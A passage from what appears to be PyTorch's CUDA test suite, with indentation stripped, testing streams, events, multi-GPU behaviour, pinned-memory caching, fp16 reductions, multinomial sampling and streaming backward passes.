self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
range_handle = torch.cuda.nvtx.range_start("range_start")
torch.cuda.nvtx.range_end(range_handle)
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Verifies that mem_get_info works, including when called for a different device
def test_mem_get_info(self):
def _test(idx):
before_free_bytes, before_available_bytes = torch.cuda.mem_get_info(idx)
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
t = torch.randn(1024 * 1024 * 8, device='cuda:' + str(idx))
after_free_bytes, after_available_bytes = torch.cuda.mem_get_info(idx)
self.assertTrue(after_free_bytes < before_free_bytes)
self.assertEqual(before_available_bytes, after_available_bytes)
_test(0)
if TEST_MULTIGPU:
_test(1)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 0.+"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:1")))
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 1.+"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
